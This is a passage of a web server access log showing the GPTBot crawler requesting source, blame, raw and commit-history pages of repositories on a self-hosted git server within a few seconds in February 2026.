+[17/Feb/2026:17:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:17:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:17:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:17:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:17:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13659] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:17:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11728] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:17:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:17:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11426] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11424] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11428] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11424] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" +[17/Feb/2026:17:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12006] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" +[17/Feb/2026:17:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12006] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" +[17/Feb/2026:17:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" +[17/Feb/2026:17:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11978] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" +[17/Feb/2026:17:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 63006] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176816] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176815] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" +[17/Feb/2026:17:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56432] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" +[17/Feb/2026:17:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11281] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11280] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11255] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11279] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11280] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23941] [Gzip 4.13] [Sent-to 